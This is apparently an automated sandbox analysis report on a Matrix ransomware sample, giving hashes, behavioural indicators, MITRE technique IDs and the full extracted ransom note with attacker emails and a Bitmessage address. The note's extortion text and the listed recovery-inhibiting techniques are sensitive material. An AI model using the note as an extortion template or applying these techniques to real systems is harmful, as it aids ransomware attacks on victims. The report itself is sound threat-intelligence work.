matrix | 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95

Analysis

max time kernel
150s
max time network
122s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
13/07/2023, 23:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MatrixRansomware.exe
Size

1.2MB
MD5

a93bd199d34d21cc9102600c6ce782cf
SHA1

31b50d84aa1af4f0e76a523382caba476f6e45dc
SHA256

242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95
SHA512

642e0cacf80a54ffa8f1bdeebb2a9b9449bb062bc331924ff8b6c93853ade68cdbd23928081d7c5da7bce944f5c553b0c4b05bd90fda525f017415bd891534c2
SSDEEP

24576:NykKxXJdZiDTrfJR5ez1888K0aNE1eXTBoAlK/u95ByxXEfui:N8bcLK+KzlK/udyh/i

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Path

C:\Program Files\Google\Chrome\Application\#README_EMAN#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected]\par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 04CF5892EDA3917C\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 04CF5892EDA3917C\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 eXcpqQxj\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]\par

[email protected]\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	ioc	Process
File created	C:\Program Files\VideoLAN\VLC\lua\intf\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jre7\lib\zi\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Microsoft Games\FreeCell\en-US\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g1epp91b.Admin\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Microsoft Games\Mahjong\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\lua\intf\modules\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Microsoft Games\Mahjong\de-DE\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\All Users\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\Favorites\Windows Live\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jre7\lib\images\cursors\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Public\Music\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Checkers\es-ES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\Favorites\Links for United States\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\All Users\Microsoft\Assistance\Client\1.0\fr-FR\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\Pictures\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Microsoft Games\Chess\de-DE\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jre7\lib\amd64\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g1epp91b.default-release\datareporting\glean\db\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g1epp91b.default-release\settings\main\ms-language-packs\browser\newtab\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jre7\lib\management\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Microsoft Games\Hearts\en-US\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Microsoft Games\More Games\fr-FR\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Mozilla Firefox\uninstall\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g1epp91b.default-release\datareporting\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
4936	bcdedit.exe
4868	bcdedit.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	WzYfqHQn64.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	WzYfqHQn64.exe

Executes dropped EXE 64 IoCs

pid	Process
2800	NWhK2Pn3.exe
3544	WzYfqHQn.exe
1036	WzYfqHQn64.exe
3260	WzYfqHQn.exe
1520	WzYfqHQn.exe
5024	WzYfqHQn.exe
2404	takeown.exe
3672	WzYfqHQn.exe
4752	WzYfqHQn.exe
2180	WzYfqHQn.exe
1828	WzYfqHQn.exe
564	WzYfqHQn.exe
2512	WzYfqHQn.exe
1800	WzYfqHQn.exe
920	WzYfqHQn.exe
4776	WzYfqHQn.exe
1768	WzYfqHQn.exe
2736	WzYfqHQn.exe
2988	WzYfqHQn.exe
3148	WzYfqHQn.exe
3184	WzYfqHQn.exe
2648	WzYfqHQn.exe
3832	WzYfqHQn.exe
1208	WzYfqHQn.exe
2344	WzYfqHQn.exe
1792	WzYfqHQn.exe
2100	WzYfqHQn.exe
1692	WzYfqHQn.exe
4912	WzYfqHQn.exe
3128	WzYfqHQn.exe
3024	WzYfqHQn.exe
5000	WzYfqHQn.exe
4072	WzYfqHQn.exe
4804	WzYfqHQn.exe
3260	WzYfqHQn.exe
3320	WzYfqHQn.exe
3344	WzYfqHQn.exe
3464	WzYfqHQn.exe
3368	WzYfqHQn.exe
4020	WzYfqHQn.exe
3504	WzYfqHQn.exe
4004	WzYfqHQn.exe
3900	WzYfqHQn.exe
3412	WzYfqHQn.exe
3928	WzYfqHQn.exe
3340	WzYfqHQn.exe
4100	WzYfqHQn.exe
4252	WzYfqHQn.exe
4708	WzYfqHQn.exe
4288	WzYfqHQn.exe
4516	WzYfqHQn.exe
4436	WzYfqHQn.exe
4344	WzYfqHQn.exe
4464	WzYfqHQn.exe
4592	WzYfqHQn.exe
4600	WzYfqHQn.exe
4572	WzYfqHQn.exe
4640	WzYfqHQn.exe
4632	WzYfqHQn.exe
2472	WzYfqHQn.exe
4512	WzYfqHQn.exe
2724	WzYfqHQn.exe
3676	WzYfqHQn.exe
1856	WzYfqHQn.exe

Loads dropped DLL 64 IoCs

pid	Process
2220	MatrixRansomware.exe
2220	MatrixRansomware.exe
1576	cmd.exe
3544	WzYfqHQn.exe
1916	cmd.exe
1692	cmd.exe
2032	cmd.exe
2612	cmd.exe
4620	conhost.exe
4904	cacls.exe
3008	cmd.exe
4272	cmd.exe
1528	cmd.exe
2084	cmd.exe
2360	cmd.exe
1920	cmd.exe
2252	cmd.exe
2972	cmd.exe
940	cmd.exe
2924	cmd.exe
3088	cmd.exe
2508	cmd.exe
3248	cmd.exe
2992	cmd.exe
3864	cmd.exe
1404	cmd.exe
1936	cmd.exe
1752	cmd.exe
856	cmd.exe
1916	cmd.exe
4376	cmd.exe
4224	cmd.exe
3944	cmd.exe
4972	cmd.exe
3312	cmd.exe
4724	cmd.exe
3364	cmd.exe
3372	cmd.exe
1020	cmd.exe
4928	cmd.exe
1676	cmd.exe
3452	cmd.exe
3952	cmd.exe
3520	cmd.exe
4064	cmd.exe
296	cmd.exe
1536	cmd.exe
4000	cmd.exe
4188	cmd.exe
1104	cmd.exe
4048	cmd.exe
4220	cmd.exe
4444	cmd.exe
4300	cmd.exe
4492	cmd.exe
4408	cmd.exe
4576	cmd.exe
4484	cmd.exe
4668	cmd.exe
4548	cmd.exe
1356	cmd.exe
884	cmd.exe
3660	cmd.exe
3656	cmd.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3928	takeown.exe
2124	takeown.exe
2352	takeown.exe
4124	Process not Found
2068	Process not Found
1484	Process not Found
2536	takeown.exe
4368	takeown.exe
3316	takeown.exe
4244	takeown.exe
4984	takeown.exe
1868	takeown.exe
2232	takeown.exe
1552	takeown.exe
4880	takeown.exe
1696	Process not Found
4224	Process not Found
1276	Process not Found
2900	takeown.exe
2460	takeown.exe
3564	takeown.exe
632	takeown.exe
2104	takeown.exe
2536	Process not Found
4060	takeown.exe
2172	takeown.exe
2352	takeown.exe
4660	takeown.exe
3712	takeown.exe
5016	takeown.exe
3468	Process not Found
3328	takeown.exe
4140	takeown.exe
784	Process not Found
3252	Process not Found
3220	takeown.exe
4876	takeown.exe
3508	takeown.exe
4040	takeown.exe
1616	Process not Found
4316	Process not Found
1732	takeown.exe
3188	takeown.exe
4200	takeown.exe
4020	takeown.exe
4724	takeown.exe
4516	takeown.exe
4200	takeown.exe
1364	takeown.exe
2292	takeown.exe
1400	takeown.exe
3944	takeown.exe
3432	takeown.exe
3124	takeown.exe
2392	takeown.exe
2844	Process not Found
4592	Process not Found
3732	Process not Found
2240	takeown.exe
3916	Process not Found
3132	Process not Found
2136	Process not Found
4756	Process not Found
4856	Process not Found

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000018f0e-1394.dat	upx
behavioral1/files/0x0007000000018f0e-1513.dat	upx
behavioral1/files/0x0007000000018f0e-1393.dat	upx
behavioral1/memory/3544-1562-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/3260-4735-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/files/0x0007000000018f0e-4722.dat	upx
behavioral1/files/0x0007000000018f0e-4721.dat	upx
behavioral1/memory/1520-5309-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/files/0x0007000000018f0e-5225.dat	upx
behavioral1/files/0x0007000000018f0e-5201.dat	upx
behavioral1/files/0x0007000000018f0e-5722.dat	upx
behavioral1/files/0x0007000000018f0e-5713.dat	upx
behavioral1/memory/5024-5754-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/files/0x0007000000018f0e-5868.dat	upx
behavioral1/memory/2404-6104-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/2404-5879-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/files/0x0007000000018f0e-5861.dat	upx
behavioral1/files/0x0007000000018f0e-6462.dat	upx
behavioral1/files/0x0007000000018f0e-6643.dat	upx
behavioral1/files/0x0007000000018f0e-6642.dat	upx
behavioral1/memory/3672-6490-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/files/0x0007000000018f0e-6464.dat	upx
behavioral1/memory/4752-6644-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/files/0x0007000000018f0e-7228.dat	upx
behavioral1/files/0x0007000000018f0e-7230.dat	upx
behavioral1/memory/2180-7233-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/files/0x0007000000018f0e-7234.dat	upx
behavioral1/files/0x0007000000018f0e-7235.dat	upx
behavioral1/memory/1828-7236-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/3672-7394-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/files/0x0007000000018f0e-7393.dat	upx
behavioral1/files/0x0007000000018f0e-7392.dat	upx
behavioral1/memory/2512-7400-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/2512-7399-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/files/0x0007000000018f0e-7398.dat	upx
behavioral1/files/0x0007000000018f0e-7397.dat	upx
behavioral1/memory/564-7396-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/files/0x0007000000018f0e-7402.dat	upx
behavioral1/files/0x0007000000018f0e-7403.dat	upx
behavioral1/memory/1800-7404-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/files/0x0007000000018f0e-7405.dat	upx
behavioral1/files/0x0007000000018f0e-7407.dat	upx
behavioral1/memory/920-7409-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/2180-7406-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/files/0x0007000000018f0e-7414.dat	upx
behavioral1/files/0x0007000000018f0e-7416.dat	upx
behavioral1/files/0x0007000000018f0e-7419.dat	upx
behavioral1/files/0x0007000000018f0e-7420.dat	upx
behavioral1/memory/4776-7417-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/1768-7421-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/files/0x0007000000018f0e-7424.dat	upx
behavioral1/files/0x0007000000018f0e-7425.dat	upx
behavioral1/memory/2736-7426-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/2988-7431-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/files/0x0007000000018f0e-7427.dat	upx
behavioral1/files/0x0007000000018f0e-7428.dat	upx
behavioral1/files/0x0007000000018f0e-7433.dat	upx
